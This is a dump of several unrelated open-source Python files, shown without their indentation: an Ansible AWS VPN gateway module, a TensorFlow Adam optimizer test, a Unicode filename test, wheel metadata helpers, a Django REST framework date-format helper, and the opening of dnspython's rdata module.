attached_vgw = attach_vgw(client, module, vpn_gateway_id)
vgw = find_vgw(client, module, [vpn_gateway_id])
changed = True
# if params['VpcId'] is not provided, check the vgw is attached to a vpc. if so, detach it.
else:
existing_vgw = find_vgw(client, module, [vpn_gateway_id])
if existing_vgw[0]['VpcAttachments'] != []:
if existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
# detach the vpc from the vgw
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
changed = True
vgw = find_vgw(client, module, [vpn_gateway_id])
else:
# create a new vgw
new_vgw = create_vgw(client, module)
changed = True
vpn_gateway_id = new_vgw['VpnGateway']['VpnGatewayId']
# tag the new virtual gateway
create_tags(client, module, vpn_gateway_id)
# return current state of the vgw
vgw = find_vgw(client, module, [vpn_gateway_id])
# if a vpc-id was supplied, attempt to attach it to the vgw
if params['VpcId']:
attached_vgw = attach_vgw(client, module, vpn_gateway_id)
changed = True
vgw = find_vgw(client, module, [vpn_gateway_id])
result = get_vgw_info(vgw)
return changed, result
def ensure_vgw_absent(client, module):
# If an existing vgw name and type matches our args, then a match is considered to have been
# found and we will take steps to delete it.
changed = False
params = dict()
result = dict()
params['Name'] = module.params.get('name')
params['VpcId'] = module.params.get('vpc_id')
params['Type'] = module.params.get('type')
params['Tags'] = module.params.get('tags')
params['VpnGatewayIds'] = module.params.get('vpn_gateway_id')
# check if a gateway matching our module args already exists
if params['VpnGatewayIds']:
existing_vgw_with_id = find_vgw(client, module, [params['VpnGatewayIds']])
if existing_vgw_with_id != [] and existing_vgw_with_id[0]['State'] != 'deleted':
existing_vgw = existing_vgw_with_id
if existing_vgw[0]['VpcAttachments'] != [] and existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
if params['VpcId']:
if params['VpcId'] != existing_vgw[0]['VpcAttachments'][0]['VpcId']:
module.fail_json(msg='The vpc-id provided does not match the vpc-id currently attached - please check the AWS console')
else:
# detach the vpc from the vgw
detach_vgw(client, module, params['VpnGatewayIds'], params['VpcId'])
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
# attempt to detach any attached vpcs
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, params['VpnGatewayIds'], vpc_to_detach)
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
# no vpc's are attached so attempt to delete the vgw
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
changed = False
deleted_vgw = "Nothing to do"
else:
#Check that a name and type argument has been supplied if no vgw-id
if not module.params.get('name') or not module.params.get('type'):
module.fail_json(msg='A name and type is required when no vgw-id and a status of \'absent\' is suppled')
existing_vgw = find_vgw(client, module)
if existing_vgw != [] and existing_vgw[0]['State'] != 'deleted':
vpn_gateway_id = existing_vgw[0]['VpnGatewayId']
if existing_vgw[0]['VpcAttachments'] != [] and existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
if params['VpcId']:
if params['VpcId'] != existing_vgw[0]['VpcAttachments'][0]['VpcId']:
module.fail_json(msg='The vpc-id provided does not match the vpc-id currently attached - please check the AWS console')
else:
# detach the vpc from the vgw
detach_vgw(client, module, vpn_gateway_id, params['VpcId'])
#now that the vpc has been detached, delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
changed = True
else:
# attempt to detach any attached vpcs
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
changed = True
#now that the vpc has been detached, delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
else:
# no vpc's are attached so attempt to delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
changed = True
else:
changed = False
deleted_vgw = None
result = deleted_vgw
return changed, result
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(default='present', choices=['present', 'absent']),
region=dict(required=True),
name=dict(),
vpn_gateway_id=dict(),
vpc_id=dict(),
wait_timeout=dict(type='int', default=320),
type=dict(default='ipsec.1', choices=['ipsec.1']),
tags=dict(default=None, required=False, type='dict', aliases=['resource_tags']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='json and boto3 is required.')
state = module.params.get('state').lower()
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.NoCredentialsError:
e = get_exception()
module.fail_json(msg="Can't authorize connection - "+str(e))
if state == 'present':
(changed, results) = ensure_vgw_present(client, module)
else:
(changed, results) = ensure_vgw_absent(client, module)
module.exit_json(changed=changed, vgw=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
alisidd/tensorflow
|
tensorflow/compiler/tests/adam_test.py
|
79
|
7193
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Adam."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
def adam_update_numpy(param,
g_t,
t,
m,
v,
alpha=0.001,
beta1=0.9,
beta2=0.999,
epsilon=1e-8):
alpha_t = alpha * np.sqrt(1 - beta2**t) / (1 - beta1**t)
m_t = beta1 * m + (1 - beta1) * g_t
v_t = beta2 * v + (1 - beta2) * g_t * g_t
param_t = param - alpha_t * m_t / (np.sqrt(v_t) + epsilon)
return param_t, m_t, v_t
class AdamOptimizerTest(XLATestCase):
def testBasic(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer()
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
beta1_power, beta2_power = opt._get_beta_accumulators()
# Run 3 steps of Adam
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
update.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
def testTensorLearningRate(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer(constant_op.constant(0.001))
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
beta1_power, beta2_power = opt._get_beta_accumulators()
# Run 3 steps of Adam
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
update.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
def testSharing(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer()
update1 = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
update2 = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
beta1_power, beta2_power = opt._get_beta_accumulators()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 3 steps of intertwined Adam1 and Adam2.
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
if t % 2 == 0:
update1.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
else:
update2.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
if __name__ == "__main__":
test.main()
|
apache-2.0
|
moto-timo/ironpython3
|
Src/StdLib/Lib/test/test_pep277.py
|
10
|
7007
|
# Test the Unicode versions of normal file functions
# open, os.open, os.stat. os.listdir, os.rename, os.remove, os.mkdir, os.chdir, os.rmdir
import os
import sys
import unittest
import warnings
from unicodedata import normalize
from test import support
filenames = [
'1_abc',
'2_ascii',
'3_Gr\xfc\xdf-Gott',
'4_\u0393\u03b5\u03b9\u03ac-\u03c3\u03b1\u03c2',
'5_\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435',
'6_\u306b\u307d\u3093',
'7_\u05d4\u05e9\u05e7\u05e6\u05e5\u05e1',
'8_\u66e8\u66e9\u66eb',
'9_\u66e8\u05e9\u3093\u0434\u0393\xdf',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
'10_\u1fee\u1ffd',
]
# Mac OS X decomposes Unicode names, using Normal Form D.
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
# "However, most volume formats do not follow the exact specification for
# these normal forms. For example, HFS Plus uses a variant of Normal Form D
# in which U+2000 through U+2FFF, U+F900 through U+FAFF, and U+2F800 through
# U+2FAFF are not decomposed."
if sys.platform != 'darwin':
filenames.extend([
# Specific code points: NFC(fn), NFD(fn), NFKC(fn) and NFKD(fn) all differents
'11_\u0385\u03d3\u03d4',
'12_\u00a8\u0301\u03d2\u0301\u03d2\u0308', # == NFD('\u0385\u03d3\u03d4')
'13_\u0020\u0308\u0301\u038e\u03ab', # == NFKC('\u0385\u03d3\u03d4')
'14_\u1e9b\u1fc1\u1fcd\u1fce\u1fcf\u1fdd\u1fde\u1fdf\u1fed',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
'15_\u1fee\u1ffd\ufad1',
'16_\u2000\u2000\u2000A',
'17_\u2001\u2001\u2001A',
'18_\u2003\u2003\u2003A', # == NFC('\u2001\u2001\u2001A')
'19_\u0020\u0020\u0020A', # '\u0020' == ' ' == NFKC('\u2000') ==
# NFKC('\u2001') == NFKC('\u2003')
])
# Is it Unicode-friendly?
if not os.path.supports_unicode_filenames:
fsencoding = sys.getfilesystemencoding()
try:
for name in filenames:
name.encode(fsencoding)
except UnicodeEncodeError:
raise unittest.SkipTest("only NT+ and systems with "
"Unicode-friendly filesystem encoding")
class UnicodeFileTests(unittest.TestCase):
files = set(filenames)
normal_form = None
def setUp(self):
try:
os.mkdir(support.TESTFN)
except FileExistsError:
pass
self.addCleanup(support.rmtree, support.TESTFN)
files = set()
for name in self.files:
name = os.path.join(support.TESTFN, self.norm(name))
with open(name, 'wb') as f:
f.write((name+'\n').encode("utf-8"))
os.stat(name)
files.add(name)
self.files = files
def norm(self, s):
if self.normal_form:
return normalize(self.normal_form, s)
return s
def _apply_failure(self, fn, filename,
expected_exception=FileNotFoundError,
check_filename=True):
with self.assertRaises(expected_exception) as c:
fn(filename)
exc_filename = c.exception.filename
if check_filename:
self.assertEqual(exc_filename, filename, "Function '%s(%a) failed "
"with bad filename in the exception: %a" %
(fn.__name__, filename, exc_filename))
def test_failures(self):
# Pass non-existing Unicode filenames all over the place.
for name in self.files:
name = "not_" + name
self._apply_failure(open, name)
self._apply_failure(os.stat, name)
self._apply_failure(os.chdir, name)
self._apply_failure(os.rmdir, name)
self._apply_failure(os.remove, name)
self._apply_failure(os.listdir, name)
if sys.platform == 'win32':
# Windows is lunatic. Issue #13366.
_listdir_failure = NotADirectoryError, FileNotFoundError
else:
_listdir_failure = NotADirectoryError
def test_open(self):
for name in self.files:
f = open(name, 'wb')
f.write((name+'\n').encode("utf-8"))
f.close()
os.stat(name)
self._apply_failure(os.listdir, name, self._listdir_failure)
# Skip the test on darwin, because darwin does normalize the filename to
# NFD (a variant of Unicode NFD form). Normalize the filename to NFC, NFKC,
# NFKD in Python is useless, because darwin will normalize it later and so
# open(), os.stat(), etc. don't raise any exception.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_normalize(self):
files = set(self.files)
others = set()
for nf in set(['NFC', 'NFD', 'NFKC', 'NFKD']):
others |= set(normalize(nf, file) for file in files)
others -= files
for name in others:
self._apply_failure(open, name)
self._apply_failure(os.stat, name)
self._apply_failure(os.chdir, name)
self._apply_failure(os.rmdir, name)
self._apply_failure(os.remove, name)
self._apply_failure(os.listdir, name)
# Skip the test on darwin, because darwin uses a normalization different
# than Python NFD normalization: filenames are different even if we use
# Python NFD normalization.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_listdir(self):
sf0 = set(self.files)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
f1 = os.listdir(support.TESTFN.encode(sys.getfilesystemencoding()))
f2 = os.listdir(support.TESTFN)
sf2 = set(os.path.join(support.TESTFN, f) for f in f2)
self.assertEqual(sf0, sf2, "%a != %a" % (sf0, sf2))
self.assertEqual(len(f1), len(f2))
def test_rename(self):
for name in self.files:
os.rename(name, "tmp")
os.rename("tmp", name)
def test_directory(self):
dirname = os.path.join(support.TESTFN, 'Gr\xfc\xdf-\u66e8\u66e9\u66eb')
filename = '\xdf-\u66e8\u66e9\u66eb'
with support.temp_cwd(dirname):
with open(filename, 'wb') as f:
f.write((filename + '\n').encode("utf-8"))
os.access(filename,os.R_OK)
os.remove(filename)
class UnicodeNFCFileTests(UnicodeFileTests):
normal_form = 'NFC'
class UnicodeNFDFileTests(UnicodeFileTests):
normal_form = 'NFD'
class UnicodeNFKCFileTests(UnicodeFileTests):
normal_form = 'NFKC'
class UnicodeNFKDFileTests(UnicodeFileTests):
normal_form = 'NFKD'
def test_main():
support.run_unittest(
UnicodeFileTests,
UnicodeNFCFileTests,
UnicodeNFDFileTests,
UnicodeNFKCFileTests,
UnicodeNFKDFileTests,
)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
bzennn/blog_flask
|
python/lib/python3.5/site-packages/wheel/metadata.py
|
62
|
11561
|
"""
Tools for converting old- to new-style metadata.
"""
import email.parser
import os.path
import re
import textwrap
from collections import namedtuple, OrderedDict
import pkg_resources
from . import __version__ as wheel_version
from .pkginfo import read_pkg_info
from .util import OrderedDefaultDict
METADATA_VERSION = "2.0"
PLURAL_FIELDS = {"classifier": "classifiers",
"provides_dist": "provides",
"provides_extra": "extras"}
SKIP_FIELDS = set()
CONTACT_FIELDS = (({"email": "author_email", "name": "author"},
"author"),
({"email": "maintainer_email", "name": "maintainer"},
"maintainer"))
# commonly filled out as "UNKNOWN" by distutils:
UNKNOWN_FIELDS = {"author", "author_email", "platform", "home_page", "license"}
# Wheel itself is probably the only program that uses non-extras markers
# in METADATA/PKG-INFO. Support its syntax with the extra at the end only.
EXTRA_RE = re.compile("""^(?P<package>.*?)(;\s*(?P<condition>.*?)(extra == '(?P<extra>.*?)')?)$""")
KEYWORDS_RE = re.compile("[\0-,]+")
MayRequiresKey = namedtuple('MayRequiresKey', ('condition', 'extra'))
def unique(iterable):
"""
Yield unique values in iterable, preserving order.
"""
seen = set()
for value in iterable:
if value not in seen:
seen.add(value)
yield value
def handle_requires(metadata, pkg_info, key):
"""
Place the runtime requirements from pkg_info into metadata.
"""
may_requires = OrderedDefaultDict(list)
for value in sorted(pkg_info.get_all(key)):
extra_match = EXTRA_RE.search(value)
if extra_match:
groupdict = extra_match.groupdict()
condition = groupdict['condition']
extra = groupdict['extra']
package = groupdict['package']
if condition.endswith(' and '):
condition = condition[:-5]
else:
condition, extra = None, None
package = value
key = MayRequiresKey(condition, extra)
may_requires[key].append(package)
if may_requires:
metadata['run_requires'] = []
def sort_key(item):
# Both condition and extra could be None, which can't be compared
# against strings in Python 3.
key, value = item
if key.condition is None:
return ''
return key.condition
for key, value in sorted(may_requires.items(), key=sort_key):
may_requirement = OrderedDict((('requires', value),))
if key.extra:
may_requirement['extra'] = key.extra
if key.condition:
may_requirement['environment'] = key.condition
metadata['run_requires'].append(may_requirement)
if 'extras' not in metadata:
metadata['extras'] = []
metadata['extras'].extend([key.extra for key in may_requires.keys() if key.extra])
def pkginfo_to_dict(path, distribution=None):
"""
Convert PKG-INFO to a prototype Metadata 2.0 (PEP 426) dict.
The description is included under the key ['description'] rather than
being written to a separate file.
path: path to PKG-INFO file
distribution: optional distutils Distribution()
"""
metadata = OrderedDefaultDict(
lambda: OrderedDefaultDict(lambda: OrderedDefaultDict(OrderedDict)))
metadata["generator"] = "bdist_wheel (" + wheel_version + ")"
try:
unicode
pkg_info = read_pkg_info(path)
except NameError:
with open(path, 'rb') as pkg_info_file:
pkg_info = email.parser.Parser().parsestr(pkg_info_file.read().decode('utf-8'))
description = None
if pkg_info['Summary']:
metadata['summary'] = pkginfo_unicode(pkg_info, 'Summary')
del pkg_info['Summary']
if pkg_info['Description']:
description = dedent_description(pkg_info)
del pkg_info['Description']
else:
payload = pkg_info.get_payload()
if isinstance(payload, bytes):
# Avoid a Python 2 Unicode error.
# We still suffer ? glyphs on Python 3.
payload = payload.decode('utf-8')
if payload:
description = payload
if description:
pkg_info['description'] = description
for key in sorted(unique(k.lower() for k in pkg_info.keys())):
low_key = key.replace('-', '_')
if low_key in SKIP_FIELDS:
continue
if low_key in UNKNOWN_FIELDS and pkg_info.get(key) == 'UNKNOWN':
continue
if low_key in sorted(PLURAL_FIELDS):
metadata[PLURAL_FIELDS[low_key]] = pkg_info.get_all(key)
elif low_key == "requires_dist":
handle_requires(metadata, pkg_info, key)
elif low_key == 'provides_extra':
if 'extras' not in metadata:
metadata['extras'] = []
metadata['extras'].extend(pkg_info.get_all(key))
elif low_key == 'home_page':
metadata['extensions']['python.details']['project_urls'] = {'Home': pkg_info[key]}
elif low_key == 'keywords':
metadata['keywords'] = KEYWORDS_RE.split(pkg_info[key])
else:
metadata[low_key] = pkg_info[key]
metadata['metadata_version'] = METADATA_VERSION
if 'extras' in metadata:
metadata['extras'] = sorted(set(metadata['extras']))
# include more information if distribution is available
if distribution:
for requires, attr in (('test_requires', 'tests_require'),):
try:
requirements = getattr(distribution, attr)
if isinstance(requirements, list):
new_requirements = sorted(convert_requirements(requirements))
metadata[requires] = [{'requires': new_requirements}]
except AttributeError:
pass
# handle contacts
contacts = []
for contact_type, role in CONTACT_FIELDS:
contact = OrderedDict()
for key in sorted(contact_type):
if contact_type[key] in metadata:
contact[key] = metadata.pop(contact_type[key])
if contact:
contact['role'] = role
contacts.append(contact)
if contacts:
metadata['extensions']['python.details']['contacts'] = contacts
# convert entry points to exports
try:
with open(os.path.join(os.path.dirname(path), "entry_points.txt"), "r") as ep_file:
ep_map = pkg_resources.EntryPoint.parse_map(ep_file.read())
exports = OrderedDict()
for group, items in sorted(ep_map.items()):
exports[group] = OrderedDict()
for item in sorted(map(str, items.values())):
name, export = item.split(' = ', 1)
exports[group][name] = export
if exports:
metadata['extensions']['python.exports'] = exports
except IOError:
pass
# copy console_scripts entry points to commands
if 'python.exports' in metadata['extensions']:
for (ep_script, wrap_script) in (('console_scripts', 'wrap_console'),
('gui_scripts', 'wrap_gui')):
if ep_script in metadata['extensions']['python.exports']:
metadata['extensions']['python.commands'][wrap_script] = \
metadata['extensions']['python.exports'][ep_script]
return metadata
def requires_to_requires_dist(requirement):
"""Compose the version predicates for requirement in PEP 345 fashion."""
requires_dist = []
for op, ver in requirement.specs:
requires_dist.append(op + ver)
if not requires_dist:
return ''
return " (%s)" % ','.join(sorted(requires_dist))
def convert_requirements(requirements):
"""Yield Requires-Dist: strings for parsed requirements strings."""
for req in requirements:
parsed_requirement = pkg_resources.Requirement.parse(req)
spec = requires_to_requires_dist(parsed_requirement)
extras = ",".join(parsed_requirement.extras)
if extras:
extras = "[%s]" % extras
yield (parsed_requirement.project_name + extras + spec)
def generate_requirements(extras_require):
"""
Convert requirements from a setup()-style dictionary to ('Requires-Dist', 'requirement')
and ('Provides-Extra', 'extra') tuples.
extras_require is a dictionary of {extra: [requirements]} as passed to setup(),
using the empty extra {'': [requirements]} to hold install_requires.
"""
for extra, depends in extras_require.items():
condition = ''
if extra and ':' in extra: # setuptools extra:condition syntax
extra, condition = extra.split(':', 1)
extra = pkg_resources.safe_extra(extra)
if extra:
yield ('Provides-Extra', extra)
if condition:
condition += " and "
condition += "extra == '%s'" % extra
if condition:
condition = '; ' + condition
for new_req in convert_requirements(depends):
yield ('Requires-Dist', new_req + condition)
def pkginfo_to_metadata(egg_info_path, pkginfo_path):
"""
Convert .egg-info directory with PKG-INFO to the Metadata 1.3 aka
old-draft Metadata 2.0 format.
"""
pkg_info = read_pkg_info(pkginfo_path)
pkg_info.replace_header('Metadata-Version', '2.0')
requires_path = os.path.join(egg_info_path, 'requires.txt')
if os.path.exists(requires_path):
with open(requires_path) as requires_file:
requires = requires_file.read()
for extra, reqs in sorted(pkg_resources.split_sections(requires),
key=lambda x: x[0] or ''):
for item in generate_requirements({extra: reqs}):
pkg_info[item[0]] = item[1]
description = pkg_info['Description']
if description:
pkg_info.set_payload(dedent_description(pkg_info))
del pkg_info['Description']
return pkg_info
def pkginfo_unicode(pkg_info, field):
"""Hack to coax Unicode out of an email Message() - Python 3.3+"""
text = pkg_info[field]
field = field.lower()
if not isinstance(text, str):
if not hasattr(pkg_info, 'raw_items'): # Python 3.2
return str(text)
for item in pkg_info.raw_items():
if item[0].lower() == field:
text = item[1].encode('ascii', 'surrogateescape') \
.decode('utf-8')
break
return text
def dedent_description(pkg_info):
"""
Dedent and convert pkg_info['Description'] to Unicode.
"""
description = pkg_info['Description']
# Python 3 Unicode handling, sorta.
surrogates = False
if not isinstance(description, str):
surrogates = True
description = pkginfo_unicode(pkg_info, 'Description')
description_lines = description.splitlines()
description_dedent = '\n'.join(
# if the first line of long_description is blank,
# the first line here will be indented.
(description_lines[0].lstrip(),
textwrap.dedent('\n'.join(description_lines[1:])),
'\n'))
if surrogates:
description_dedent = description_dedent \
.encode("utf8") \
.decode("ascii", "surrogateescape")
return description_dedent
if __name__ == "__main__":
import sys
import pprint
pprint.pprint(pkginfo_to_dict(sys.argv[1]))
|
gpl-3.0
|
kezabelle/django-rest-framework
|
rest_framework/utils/humanize_datetime.py
|
144
|
1285
|
"""
Helper functions that convert strftime formats into more readable representations.
"""
from rest_framework import ISO_8601
def datetime_formats(formats):
format = ', '.join(formats).replace(
ISO_8601,
'YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z]'
)
return humanize_strptime(format)
def date_formats(formats):
format = ', '.join(formats).replace(ISO_8601, 'YYYY[-MM[-DD]]')
return humanize_strptime(format)
def time_formats(formats):
format = ', '.join(formats).replace(ISO_8601, 'hh:mm[:ss[.uuuuuu]]')
return humanize_strptime(format)
def humanize_strptime(format_string):
# Note that we're missing some of the locale specific mappings that
# don't really make sense.
mapping = {
"%Y": "YYYY",
"%y": "YY",
"%m": "MM",
"%b": "[Jan-Dec]",
"%B": "[January-December]",
"%d": "DD",
"%H": "hh",
"%I": "hh", # Requires '%p' to differentiate from '%H'.
"%M": "mm",
"%S": "ss",
"%f": "uuuuuu",
"%a": "[Mon-Sun]",
"%A": "[Monday-Sunday]",
"%p": "[AM|PM]",
"%z": "[+HHMM|-HHMM]"
}
for key, val in mapping.items():
format_string = format_string.replace(key, val)
return format_string
|
bsd-2-clause
|
antsant/namebench
|
nb_third_party/dns/rdata.py
|
215
|
14860
|
# Copyright (C) 2001-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS rdata.
@var _rdata_modules: A dictionary mapping a (rdclass, rdtype) tuple to
the module which implements that type.
@type _rdata_modules: dict
@var _module_prefix: The prefix to use when forming modules names. The
default is 'dns.rdtypes'. Changing this value will break the library.
@type _module_prefix: string
@var _hex_chunk: At most this many octets that will be represented in each
chunk of hexstring that _hexify() produces before whitespace occurs.
@type _hex_chunk: int"""
import cStringIO
import dns.exception
import dns.rdataclass
import dns.rdatatype
import dns.tokenizer
_hex_chunksize = 32
def _hexify(data, chunksize=None):
"""Convert a binary string into its hex encoding, broken up into chunks
of I{chunksize} characters separated by a space.
@param data: the binary string
@type data: string
@param chunksize: the chunk size. Default is L{dns.rdata._hex_chunksize}
@rtype: string
"""
if chunksize is None:
chunksize = _hex_chunksize
hex = data.encode('hex_codec')
l = len(hex)
if l > chunksize:
chunks = []
i = 0
while i < l:
chunks.append(hex[i : i + chunksize])
i += chunksize
hex = ' '.join(chunks)
return hex
_base64_chunksize = 32
def _base64ify(data, chunksize=None):
"""Convert a binary string into its base64 encoding, broken up into chunks
of I{chunksize} characters separated by a space.
@param data: the binary string
@type data: string
@param chunksize: the chunk size. Default is
L{dns.rdata._base64_chunksize}
@rtype: string
"""
if chunksize is None:
chunksize = _base64_chunksize
b64 = data.encode('base64_codec')
b64 = b64.replace('\n', '')
l = len(b64)
if l > chunksize:
chunks = []
i = 0
while i < l:
chunks.append(b64[i : i + chunksize])
i += chunksize
b64 = ' '.join(chunks)
return b64
__escaped = {
'"' : True,
'\\' : True,
}
def _escapify(qstring):
"""Escape the characters in a quoted string which need it.
@param qstring: the string
@type qstring: string
@returns: the escaped string
@rtype: string
"""
text = ''
for c in qstring:
if c in __escaped:
text += '\\' + c
elif ord(c) >= 0x20 and ord(c) < 0x7F:
text += c
else:
text += '\\%03d' % ord(c)
return text
def _truncate_bitmap(what):
"""Determine the index of greatest byte that isn't all zeros, and
return the bitmap that contains all the bytes less than that index.
@param what: a string of octets representing a bitmap.
@type what: string
@rtype: string
"""
for i in xrange(len(what) - 1, -1, -1):
if what[i] != '\x00':
break
return ''.join(what[0 : i + 1])
class Rdata(object):
"""Base class for all DNS rdata types.
"""
__slots__ = ['rdclass', 'rdtype']
def __init__(self, rdclass, rdtype):
"""Initialize an rdata.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
"""
self.rdclass = rdclass
self.rdtype = rdtype
def covers(self):
"""DNS SIG/RRSIG rdatas apply to a specific type; this type is
returned by the covers() function. If the rdata type is not
SIG or RRSIG, dns.rdatatype.NONE is returned. This is useful when
creating rdatasets, allowing the rdataset to contain only RRSIGs
of a particular type, e.g. RRSIG(NS).
